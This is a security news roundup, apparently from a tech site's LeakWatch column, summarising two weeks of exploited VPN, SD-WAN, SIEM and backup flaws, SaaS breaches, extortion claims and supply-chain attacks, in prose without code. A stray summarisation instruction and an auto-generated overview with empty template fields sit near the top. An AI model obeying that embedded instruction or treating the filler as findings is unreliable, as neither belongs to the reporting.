LeakWatch 2026: Week 24/25 Trends in Cybersecurity

Author:

Using an unordered list, summarize the following article with between 4 and 8 key points.

📖 Reading time: approx. 17 minutes · 3,252 words · 21,942 charactersBrief content overviewLeakWatch 2026 – LeakWatch week 24/25 2026, two weeks behind and a rather clear trend
This article reviews the security landscape over the past two weeks, highlighting a clear trend in cyberattacks targeting critical IT infrastructure such as VPN gateways, SD-WAN management, and backup servers. The findings indicate a shift from niche products to essential components of modern IT systems, emphasizing the need for heightened security measures in these areas.

Key facts

Technical specifications
No specific technical specifications were provided in the source material.

Measured values and observations
No specific measured values were provided in the source material.

Teardown, materials and construction
No teardown or material evidence was provided in the source material.

Test conditions and limitations
No specific test conditions or limitations were provided in the source material.

Assessment
The recent trend indicates a shift in cyberattacks towards critical infrastructure components rather than niche products. This change highlights the importance of securing VPN gateways, SD-WAN management, and backup servers, which are essential for maintaining operational integrity in modern IT environments.

Strengths
The article effectively identifies and summarizes key vulnerabilities and their implications for organizations, providing a clear overview of the current security landscape.

Limitations
The article lacks specific measured values and detailed technical specifications that could enhance the understanding of the vulnerabilities discussed.

Questions and answers

What is the main focus of the article? The article focuses on recent trends in cyberattacks targeting critical IT infrastructure.
What vulnerabilities are highlighted? The article highlights vulnerabilities in VPN gateways, SD-WAN management, and backup servers.
How many vulnerabilities were fixed in Microsoft’s June Patch Tuesday? Microsoft fixed 206 vulnerabilities, including three zero-days and 37 critical issues.
What is CVE-2026-42897? It is a cross-site scripting vulnerability in Microsoft Exchange Server that was actively exploited before being patched.
What should organizations focus on to improve security? Organizations should focus on securing control points such as VPN gateways, SD-WAN managers, and backup systems.
Generated as an editorial, reader-visible overview from the article content.Sometimes a pause is not editorial silence, but simply the price of the fact that after a trade show, not only press kits, appointments, and meeting notes end up on the desk, but the actual follow-up work still has to be done. That was exactly the case after Computex. The regular Leakwatch issue had to wait because, alongside trade show reports, manufacturer meetings, follow-up research, and the usual day-to-day business, a stack had accumulated that could not be handled with a quick glance at a few headlines. This issue therefore turns out somewhat differently, namely as a concentrated review of the past two weeks, with an eye on the larger line behind it. And that line is relatively clear. The attacks of the past few days targeted less exotic niche products and more the boring but business-critical hinges of modern IT, namely VPN gateways, SD-WAN management, backup servers, SIEM instances, SaaS platforms, browsers, package sources, and credentials. Anyone striking at these points does not need to take over every individual endpoint. It is enough to compromise the door, the key ring, or the recovery process itself.

Microsoft’s June Patch Tuesday, volume alone is already a warning sign
Microsoft’s June Patch Tuesday was unusually large. CrowdStrike counts 206 fixed vulnerabilities, including three publicly known zero-days and 37 rated as critical. What stands out is not only the number itself, but also the distribution: according to the analysis, Windows received the most fixes, followed by Extended Security Updates and Office, while the most common attack classes were privilege escalation, remote code execution, and information disclosure. This is not an academic metric, but a practical prioritization aid, because exactly these classes regularly form the bridge between initial access, persistence, and lateral movement in real attack chains. Exchange Server received particular attention with CVE-2026-42897. The NVD describes the vulnerability as a cross-site scripting issue in Microsoft Exchange Server that allows an unauthenticated attacker to perform spoofing over the network. SecurityWeek adds that Microsoft closed the vulnerability with the June Patch Tuesday and that it had already been actively exploited beforehand. The technical classification remains important: based on the public description, this is not a classic Exchange Server RCE in the style of earlier ProxyShell debates, but an attack on the webmail context and thus on an already privileged user environment. For administrators, that does not make the issue any less serious, but it does prevent incorrect threat modeling.
At the same time, it became clear once again how sensitive perceptions around coordinated disclosure have become. Reports on additional publicly discussed Defender and Windows issues show that the line between security research, pressure on vendors, and real endangerment of production systems is becoming increasingly thin. For companies, the sober conclusion is this: not every publicly discussed vulnerability is immediately exploited on a broad scale, but every public proof of concept shortens the time window in which an unpatched system can still be considered an acceptable residual risk.
VPN, firewall, and SD-WAN, the new old crown jewels
On 8 June, Check Point confirmed active exploitation of CVE-2026-50751, a critical authentication bypass in Remote Access VPN and Mobile Access, provided the outdated IKEv1 key exchange is still in use. The vendor states that, due to a logic flaw in certificate validation, an attacker can establish a VPN session without a valid user password. Check Point names only a few dozen specifically affected organizations worldwide, but references at least one case with subsequent activity by a Qilin ransomware affiliate. That makes the vulnerability a good example of what is so unpleasant about edge systems: the absolute number of victims may be small, but the quality of access can be very high.
Cisco also had to follow up again. SecurityWeek reports on CVE-2026-20262 in Cisco Catalyst SD-WAN Manager, a vulnerability for writing arbitrary files that Cisco says it observed in limited attacks in June 2026. According to the report, valid credentials with at least write permissions are required, which does not diminish the vulnerability but rather shifts it toward compromised administrative access. That is exactly where the real risk begins in SD-WAN environments, because the management plane decides routing, policies, and site connectivity. Anyone who reaches that layer does not merely gain a server, but potentially a piece of network logic in their hands.
Fortinet appeared in two separate contexts. On the one hand, CISA warned, according to The Hacker News, about ongoing activity against FortiGate systems in the context of the campaign referred to as FortiBleed, in which, according to reports, tens of thousands of devices or credentials are said to have been affected. On the other hand, several FortiSandbox vulnerabilities became publicly relevant, with Fortinet itself describing CVE-2026-39813 as a critical path traversal flaw in the JRPC API that under certain versions can enable an unauthenticated authentication bypass or privilege escalation. That security products themselves repeatedly become part of the attack surface is not new, but the concentration of edge and security platforms remains the truly unpleasant finding.
Splunk and Veeam, when defense and recovery themselves become the attack surface
With SVD-2026-0603, Splunk published a critical vulnerability in Splunk Enterprise, CVE-2026-20253. According to the advisory, in certain 10.x versions, unauthenticated users can create or truncate arbitrary files via a PostgreSQL sidecar endpoint if that service is reachable. Splunk rates the issue at CVSS 9.8, confirmed limited exploitation on 18 June, and recommends moving to fixed versions. As a workaround, the PostgreSQL sidecar can be disabled, provided the environment does not require dependent features such as Edge Processor, OpAmp, or SPL2 data pipelines. This is relevant because Splunk in many companies is not just any server, but a core component of detection, analysis, and forensic traceability. A SIEM instance whose file system can be manipulated is more than just a patching problem. It also affects chains of evidence, the integrity of analyses, and trust in log data. Anyone operating Splunk should therefore not only update, but also check whether unusual file operations, sidecar accesses, or unexpected process chains occurred before the patch.
Veeam, meanwhile, closed the critical vulnerability CVE-2026-44963 in Backup & Replication with KB4869. The vendor describes a remote-code-execution issue on the backup server by an authenticated domain user; affected are Veeam Backup & Replication 12.3.2.4465 and older version 12 builds, with the fix beginning in 12.3.2.4854. Particularly important is the note that only domain-joined backup servers are affected. In practice, however, that is not a special case at all, but rather the normal state in many mature environments. From a defender’s perspective, Veeam is a classic high-value target. Ransomware groups are interested not only in production data, but also in everything that enables or prevents recovery. Whoever controls the backup server can delete, encrypt, exfiltrate, or sabotage recovery plans. That is why this vulnerability does not belong in the category “at the next maintenance window,” but rather in the category “inventory, patch, check domain trust, secure logs.”
SaaS and integrations, the blind spot between convenience and loss of control
According to reports, ServiceNow confirmed a security issue in which unauthenticated access to instances was possible under certain conditions. The Hacker News reports that ServiceNow rolled out a security update to hosted customer instances on 5 June and later confirmed that successful queries of instance tables had been observed for a subset of customers. TechCrunch adds that ServiceNow categorized the incident to the publication as activity by security researchers in the context of bug bounty submissions, not as a classic hack by malicious actors. That distinction is important, but it does not change the fact that for affected customers the questions remain which data was queried, how it was logged, and whether sensitive information was internally forwarded.
The integration risk becomes even clearer in the case of Klue. BleepingComputer reports that attackers gained access to parts of the integration infrastructure via compromised legacy credentials, extracted OAuth tokens, and used them to retrieve data from connected customer environments, including Salesforce. According to the report, Klue stated there were no indications of a direct compromise of customer content stored directly in Klue; the incident was limited to third-party integrations. That sentence sounds reassuring, but it describes the core problem of modern SaaS landscapes: data does not only reside where the customer believes it does, but also in the token relationships between systems.
Oracle PeopleSoft also became a topic. BleepingComputer reports that ShinyHunters is claiming ongoing data theft attacks against PeopleSoft instances and speaks of data from more than 100 organizations. The actor claimed to have used a combination of older and zero-day vulnerabilities, while Oracle had not yet publicly issued a comprehensive statement at the time of the report. PeopleSoft in many organizations is not glamorous, but deeply integrated into HR, finance, procurement, or university administration. When data leaks there, it is rarely just a technical table, but personnel, payroll, contract, and organizational data.
Extortion remains data trading with a stage set
Reuters reported on 16 June about FulcrumSec and a claimed attack on Novo Nordisk. The group claims to have stolen more than one terabyte of data and, after an unsuccessful demand for 25 million US dollars, is considering selling or publishing parts of it. Novo Nordisk confirmed a cybersecurity incident on 11 June with unauthorized access to a limited number of internal IT systems and certain personal data, but Reuters could not independently verify the authenticity of the data claimed by the group. That limitation is crucial, because extortionists fundamentally frame their narratives to create maximum pressure. The case is still relevant because it shows how the extortion narrative is changing. It is no longer just about encrypted files, but about research, source code, clinical data, personal information, production environments, and internal AI models. When such claims are on the table, the effect on the market, partners, patients, research, and regulators is already there, even if individual data sets have not yet been verified. Modern extortion therefore increasingly functions as a mixture of data theft, PR operation, and due-diligence attack on trust in a company.
ShinyHunters also remained visible in recent weeks. At the Council of Europe, the group claimed, according to BleepingComputer, to have stolen more than 429,000 documents containing HR and payroll data from multiple departments. Here, too, the source is an attacker claim that the affected organization is investigating. But the stated data types, including payslips, personnel files, résumés, and potentially medical information, again show why HR systems have become among the most valuable targets. They contain identities, money flows, internal structures, and often enough sensitive attachments that were never intended for a public stage.
The 24-billion-record dataset, not everything is new, but everything is usable
On 17 June, Cybernews reported a publicly reachable Elasticsearch cluster with 24 billion records and more than 8.3 terabytes in size. According to the report, it contained usernames, email addresses, plaintext passwords, and login URLs, while Cybernews itself notes that it is unclear how many duplicates were included and how many unique individuals were affected. According to the report, the data came from 36 sources, including Telegram channels, older breach collections, infostealer logs, and possibly directly exported data from live systems. Cybernews later added that the dataset belonged to a threat intelligence or breach monitoring platform and had been exposed through a misconfiguration during a temporary migration. That makes the case not a classic single-company breach, but a kind of meta-leak. Such collections are particularly unpleasant because they combine old, new, and in some cases enriched credentials. Even if many records are duplicated, old, or already known, the practical damage remains high as soon as passwords are reused or infostealer logs contain not only passwords but also cookies, tokens, device information, and target URLs. For defenders, the question is less about the biggest number and more about the smallest still active combination of user, password, service, and missing multifactor protection.
Supply chains, developers, and the end of the comfortable package romance
The Record reported on 16 June that GitHub, according to security researchers, rejected two formal reports about design issues that are now being exploited by variants of the Shai-Hulud supply-chain worm. The attacks are linked to compromised packages and developer accounts, while the original malware is said to have emerged from the TeamPCP environment and imitators are now appearing. The details are still heavily shaped by the current state of research and reporting, but the larger point is clear: developer accounts, Actions, package releases, and CI/CD secrets are long since productive attack targets.
Arch Linux also received a stark reminder that community repositories are a trust model, but not a magical security boundary. The Hacker News reports on more than 400 manipulated AUR packages whose build scripts were altered so that a credential stealer was executed. Particularly perfidious is the fact that, according to the report, the official Arch repositories were not compromised; rather, abandoned community packages were taken over and their PKGBUILD or installation logic changed. The attack therefore targeted less a classic software vulnerability than social and organizational weaknesses in the package ecosystem. For developer workstations, this is an unpleasant finding. They contain SSH keys, GitHub tokens, npm access, container logins, cloud credentials, chat sessions, and often enough production access side by side. Anyone compromising a developer machine via a package, an extension, or a build script gains not only a machine, but potentially the tools to write into additional projects. That is exactly why software supply-chain security is becoming less and less a matter of checklists and more and more a question of cleanly separated identities, package delays, signatures, reproducible builds, and consistent token hygiene.
SocGholish, WordPress, and the cleanup of old infection chains
As part of a special analysis, Shadowserver reported that Dutch authorities had removed SocGholish backdoors and malware from 14,971 legitimate WordPress sites. In addition, 106 servers and domains were taken offline worldwide. The action was part of Operation Endgame and targeted an infrastructure that has been delivering initial access through fake update campaigns for years. Shadowserver also refers to data on more than 1.4 million compromised WordPress instances that were available for SocGholish between May 2023 and May 2026. This is also relevant for smaller site operators, because SocGholish does not function like an isolated defacement attack. A compromised WordPress site can become a delivery point for fake browser updates, which in turn lead to downloaders, infostealers, or later ransomware access. Cleaning up a site is therefore only the first step. Passwords, unknown user accounts, plugins, themes, server privileges, and old web shells must also be checked, otherwise the supposedly harmless company website remains the entry point into foreign networks.
Classification: the last two weeks were not an outlier
The common denominator of these two weeks is not “more cybercrime,” because that statement would be too broad. More precisely: attackers are continuing to work at the points where organizations centralize control. VPN gateways centralize access. SD-WAN managers centralize network control. Backup systems centralize recovery. SIEM systems centralize visibility. SaaS platforms centralize business processes. Package repositories centralize trust. OAuth tokens centralize convenience. This centralization is what makes modern IT efficient, but it also creates points where a single failure has a very large impact.
The pause in LeakWatch was therefore not ideal, but it at least had the editorial side effect of making the patterns more visible. A single patch day, a single threat actor claim, or a single compromised OAuth token can quickly appear to be an isolated incident. In the two-week view, a different picture emerges. The attacks continue to shift away from individual clients toward the control points, and that is exactly where inventory, patch speed, segmentation, logging, and access hygiene must become much more consistent.

What is LeakWatch?As part of this editorial project, a separately programmed and trained bot is used for the author’s specialized internet research, which performs automated analysis of relevant data sources and also creates translations. The aim is to use primary sources that are as unaltered as possible, which is why all links are recorded in tabular form to enable optional in-depth research by interested readers. Without AI support, the automated search and extraction would only be feasible with disproportionate effort; nevertheless, every evaluation and the actual text production are carried out editorially, and everything is also reviewed again for content, as the AI cannot interpret or formulate all content with complete reliability. LeakWatch is designed as a periodic security and leak analysis format created in the style of igor’sLAB and in accordance with specific requirements. The focus is on verifiable events from primary sources, technical classification, and a fully neutral assessment without the influence of already filtered third-party secondary information.

Noch keine sichtbaren Antworten im Forum gefunden. Der Thread ist bereits angelegt und kann direkt im Forum geöffnet werden.